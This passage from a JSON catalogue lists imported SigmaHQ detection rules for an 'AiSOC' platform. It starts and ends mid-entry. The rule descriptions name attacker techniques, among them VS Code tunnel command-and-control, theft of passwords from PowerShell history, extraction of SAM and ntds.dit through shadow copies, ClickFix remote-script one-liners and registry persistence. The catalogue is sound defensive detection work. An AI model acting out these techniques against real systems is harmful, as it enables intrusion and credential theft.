Attackers can abuse this functionality to establish a C2 channel and execute arbitrary commands on the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/visual-studio-code-tunnel-shell-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f4a623c2-4ef5-4c33-b811-0642f702c9f1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_vscode_tunnel_remote_shell_.yml" } }, { "id": "sigmahq-sigma-f4bbd493-b796-416e-bbf2-121235348529", "type": "detection", "name": "Non Interactive PowerShell Process Spawned", "description": "Detects non-interactive PowerShell activity by looking at the \"powershell\" process with a parent process that is not a user GUI process such as \"explorer.exe\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/non-interactive-powershell-process-spawned.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f4bbd493-b796-416e-bbf2-121235348529", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/process_creation/proc_creation_win_powershell_non_interactive_execution.yml" } }, { "id": "sigmahq-sigma-f4d3748a-65d1-4806-bd23-e25728081d01", "type": "detection", "name": "Network Sniffing - Linux", "description": "Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.\nAn adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1040" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/network-sniffing-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f4d3748a-65d1-4806-bd23-e25728081d01", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/execve/lnx_auditd_network_sniffing.yml" } }, { "id": "sigmahq-sigma-f4ff7323-b5fc-4323-8b52-6b9408e15788", "type": "detection", "name": "Potential PowerShell Console History Access Attempt via History File", "description": "Detects potential access attempts to the PowerShell console history directly via history file (ConsoleHost_history.txt).\nThis can give access to plaintext passwords used in PowerShell commands or used for general reconnaissance.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": 
"imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-powershell-console-history-access-attempt-via-history-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f4ff7323-b5fc-4323-8b52-6b9408e15788", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_console_history_file_access.yml" } }, { "id": "sigmahq-sigma-f50f3c09-557d-492d-81db-9064a8d4e211", "type": "detection", "name": "Suspicious Execution Of Renamed Sysinternals Tools - Registry", "description": "Detects the creation of the \"accepteula\" key related to the Sysinternals tools being created from executables with the wrong name (e.g. a renamed Sysinternals tool)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1588.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-execution-of-renamed-sysinternals-tools-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f50f3c09-557d-492d-81db-9064a8d4e211", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_pua_sysinternals_renamed_execution_via_eula.yml" } }, { "id": "sigmahq-sigma-f512acbf-e662-4903-843e-97ce4652b740", "type": "detection", "name": "Volume Shadow Copy Mount", "description": "Detects volume shadow copy mount via 
Windows event log", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1003.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/volume-shadow-copy-mount.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f512acbf-e662-4903-843e-97ce4652b740", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/microsoft_windows_ntfs/win_system_volume_shadow_copy_mount.yml" } }, { "id": "sigmahq-sigma-f5141b6d-9f42-41c6-a7bf-2a780678b29b", "type": "detection", "name": "Gatekeeper Bypass via Xattr", "description": "Detects macOS Gatekeeper bypass via xattr utility", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1553.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/gatekeeper-bypass-via-xattr.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f5141b6d-9f42-41c6-a7bf-2a780678b29b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_xattr_gatekeeper_bypass.yml" } }, { "id": "sigmahq-sigma-f5240972-3938-4e56-8e4b-e33893176c1f", "type": "detection", "name": "Suspicious Query of MachineGUID", "description": "Use of reg to get 
MachineGuid information", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-query-of-machineguid.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f5240972-3938-4e56-8e4b-e33893176c1f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reg_machineguid.yml" } }, { "id": "sigmahq-sigma-f53714ec-5077-420e-ad20-907ff9bb2958", "type": "detection", "name": "Forfiles.EXE Child Process Masquerading", "description": "Detects the execution of \"forfiles\" from a non-default location, in order to potentially spawn a custom \"cmd.exe\" from the current working directory.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/forfiles-exe-child-process-masquerading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f53714ec-5077-420e-ad20-907ff9bb2958", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_forfiles_child_process_masquerading.yml" } }, { "id": 
"sigmahq-sigma-f548a603-c9f2-4c89-b511-b089f7e94549", "type": "detection", "name": "Potential Persistence Via Microsoft Compatibility Appraiser", "description": "Detects manual execution of the \"Microsoft Compatibility Appraiser\" task via schtasks, in order to trigger persistence stored in the \"\\AppCompatFlags\\TelemetryController\" registry key.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-microsoft-compatibility-appraiser.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f548a603-c9f2-4c89-b511-b089f7e94549", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_schtasks_persistence_windows_telemetry.yml" } }, { "id": "sigmahq-sigma-f576a613-2392-4067-9d1a-9345fb58d8d1", "type": "detection", "name": "Automated Collection Command Prompt", "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1119", "T1552.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/automated-collection-command-prompt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": 
"SigmaHQ/sigma", "source_id": "f576a613-2392-4067-9d1a-9345fb58d8d1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_automated_collection.yml" } }, { "id": "sigmahq-sigma-f57c58b3-ee69-4ef5-9041-455bf39aaa89", "type": "detection", "name": "Remote CHM File Download/Execution Via HH.EXE", "description": "Detects the usage of \"hh.exe\" to execute/download remotely hosted \".chm\" files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-chm-file-download-execution-via-hh-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f57c58b3-ee69-4ef5-9041-455bf39aaa89", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hh_chm_remote_download_or_execution.yml" } }, { "id": "sigmahq-sigma-f57f8d16-1f39-4dcb-a604-6c73d9b54b3d", "type": "detection", "name": "Sensitive File Access Via Volume Shadow Copy Backup", "description": "Detects a command that accesses the VolumeShadowCopy in order to extract sensitive files such as the Security or SAM registry hives or the AD database (ntds.dit)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, 
"path": "detections/sigma-imports/_quarantine/sensitive-file-access-via-volume-shadow-copy-backup.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f57f8d16-1f39-4dcb-a604-6c73d9b54b3d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_sensitive_file_access_shadowcopy.yml" } }, { "id": "sigmahq-sigma-f598ea0c-c25a-4f72-a219-50c44411c791", "type": "detection", "name": "Possible Shadow Credentials Added", "description": "Detects possible addition of shadow credentials to an active directory object.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1556" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/possible-shadow-credentials-added.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f598ea0c-c25a-4f72-a219-50c44411c791", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_susp_possible_shadow_credentials_added.yml" } }, { "id": "sigmahq-sigma-f59c3faf-50f3-464b-9f4c-1b67ab512d99", "type": "detection", "name": "Common Autorun Keys Modification", "description": "Detects modification of autostart extensibility point (ASEP) in registry.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.001" ], 
"log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/common-autorun-keys-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f59c3faf-50f3-464b-9f4c-1b67ab512d99", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_common.yml" } }, { "id": "sigmahq-sigma-f5d19838-41b5-476c-98d8-ba8af4929ee2", "type": "detection", "name": "LOL-Binary Copied From System Directory", "description": "Detects a suspicious copy operation that tries to copy a known LOLBIN from system (System32, SysWOW64, WinSxS) directories to another location on disk in order to bypass location-based detections.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/lol-binary-copied-from-system-directory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f5d19838-41b5-476c-98d8-ba8af4929ee2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_copy_system_dir_lolbin.yml" } }, { "id": "sigmahq-sigma-f5d1def8-1de0-4a0e-9794-1f6f27dd605c", "type": "detection", "name": "PowerShell Hotfix Enumeration", "description": "Detects call to 
\"Win32_QuickFixEngineering\" in order to enumerate installed hotfixes often used in \"enum\" scripts by attackers", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-hotfix-enumeration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f5d1def8-1de0-4a0e-9794-1f6f27dd605c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_hotfix_enum.yml" } }, { "id": "sigmahq-sigma-f5e3b62f-e577-4e59-931e-0a15b2b94e1e", "type": "detection", "name": "HackTool - Htran/NATBypass Execution", "description": "Detects executable names or flags used by Htran or Htran-like tools (e.g. 
NATBypass)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1090" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-htran-natbypass-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f5e3b62f-e577-4e59-931e-0a15b2b94e1e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_htran_or_natbypass.yml" } }, { "id": "sigmahq-sigma-f5fe36cf-f1ec-4c23-903d-09a3110f6bbb", "type": "detection", "name": "Potential ClickFix Execution Pattern - Registry", "description": "Detects potential ClickFix malware execution patterns by monitoring registry modifications in RunMRU keys containing HTTP/HTTPS links.\nClickFix is known to be distributed through phishing campaigns and uses techniques like clipboard hijacking and fake CAPTCHA pages.\nThrough the fake CAPTCHA pages, the adversary tricks users into opening the Run dialog box and pasting clipboard-hijacked content,\nsuch as one-liners that execute remotely hosted malicious files or scripts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1204.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-clickfix-execution-pattern-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", 
"source_id": "f5fe36cf-f1ec-4c23-903d-09a3110f6bbb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_potential_clickfix_execution.yml" } }, { "id": "sigmahq-sigma-f62176f3-8128-4faa-bf6c-83261322e5eb", "type": "detection", "name": "Malicious PowerShell Keywords", "description": "Detects keywords from well-known PowerShell exploitation frameworks", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/malicious-powershell-keywords.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f62176f3-8128-4faa-bf6c-83261322e5eb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_malicious_keywords.yml" } }, { "id": "sigmahq-sigma-f63508a0-c809-4435-b3be-ed819394d612", "type": "detection", "name": "Potential Privileged System Service Operation - SeLoadDriverPrivilege", "description": "Detects the usage of the 'SeLoadDriverPrivilege' privilege. 
This privilege is required to load or unload a device driver.\nWith this privilege, the user can dynamically load and unload device drivers or other code into kernel mode.\nThis user right does not apply to Plug and Play device drivers.\nIf you exclude privileged users/admins and processes, which are allowed to do so, you may be left with bad programs trying to load malicious kernel drivers.\nThis will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs) and the usage of Sysinternals and various other tools. So you have to work with a whitelist to find the bad stuff.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-privileged-system-service-operation-seloaddriverprivilege.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f63508a0-c809-4435-b3be-ed819394d612", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_user_driver_loaded.yml" } }, { "id": "sigmahq-sigma-f63b56ee-3f79-4b8a-97fb-5c48007e8573", "type": "detection", "name": "New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE", "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001", "T1112" ], "log_source": null, "playbook": null, "verified": 
false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-dns-serverlevelplugindll-installed-via-dnscmd-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f63b56ee-3f79-4b8a-97fb-5c48007e8573", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml" } }, { "id": "sigmahq-sigma-f6451de4-df0a-41fa-8d72-b39f54a08db5", "type": "detection", "name": "PUA - PAExec Default Named Pipe", "description": "Detects PAExec default named pipe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-paexec-default-named-pipe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f6451de4-df0a-41fa-8d72-b39f54a08db5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/pipe_created/pipe_created_pua_paexec_default_pipe.yml" } }, { "id": "sigmahq-sigma-f64b6e9a-5d9d-48a5-8289-e1dd2b3876e1", "type": "detection", "name": "Suspicious Log Entries", "description": "Detects suspicious log entries in Linux log files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, 
"verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-log-entries.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f64b6e9a-5d9d-48a5-8289-e1dd2b3876e1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/builtin/lnx_shell_susp_log_entries.yml" } }, { "id": "sigmahq-sigma-f64c9b2d-b0ad-481d-9d03-7fc75020892a", "type": "detection", "name": "Potential RoboForm.DLL Sideloading", "description": "Detects potential DLL sideloading of \"roboform.dll\", a DLL used by RoboForm Password Manager", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-roboform-dll-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f64c9b2d-b0ad-481d-9d03-7fc75020892a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_robform.yml" } }, { "id": "sigmahq-sigma-f64e5c19-879c-4bae-b471-6d84c8339677", "type": "detection", "name": "Webshell Tool Reconnaissance Activity", "description": "Detects processes spawned from web servers (PHP, Tomcat, IIS, etc.) 
that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/webshell-tool-reconnaissance-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f64e5c19-879c-4bae-b471-6d84c8339677", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_webshell_tool_recon.yml" } }, { "id": "sigmahq-sigma-f65e22f9-819e-4f96-9c7b-498364ae7a25", "type": "detection", "name": "Potential RemoteFXvGPUDisablement.EXE Abuse", "description": "Detects PowerShell module creation where the module Contents are set to \"function Get-VMRemoteFXPhysicalVideoAdapter\". 
This could be a sign of potential abuse of the \"RemoteFXvGPUDisablement.exe\" binary which is known to be vulnerable to module load-order hijacking.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-remotefxvgpudisablement-exe-abuse.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f65e22f9-819e-4f96-9c7b-498364ae7a25", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_classic/posh_pc_remotefxvgpudisablement_abuse.yml" } }, { "id": "sigmahq-sigma-f663a6d9-9d1b-49b8-b2b1-0637914d199a", "type": "detection", "name": "Narrator's Feedback-Hub Persistence", "description": "Detects abusing Windows 10 Narrator's Feedback-Hub", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/narrator-s-feedback-hub-persistence.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f663a6d9-9d1b-49b8-b2b1-0637914d199a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/registry/registry_event/registry_event_narrator_feedback_persistance.yml" } }, { "id": "sigmahq-sigma-f674e36a-4b91-431e-8aef-f8a96c2aca35", "type": "detection", "name": "CurrentControlSet Autorun Keys Modification", "description": "Detects modification of autostart extensibility point (ASEP) in registry.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/currentcontrolset-autorun-keys-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f674e36a-4b91-431e-8aef-f8a96c2aca35", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml" } }, { "id": "sigmahq-sigma-f68c4a4f-19ef-4817-952c-50dce331f4b0", "type": "detection", "name": "Potential WizardUpdate Malware Infection", "description": "Detects the execution traces of the WizardUpdate malware. 
WizardUpdate is a macOS trojan that attempts to infiltrate macOS machines to steal data and it is associated with other types of malicious payloads, increasing the chances of multiple infections on a device.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-wizardupdate-malware-infection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f68c4a4f-19ef-4817-952c-50dce331f4b0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_wizardupdate_malware_infection.yml" } }, { "id": 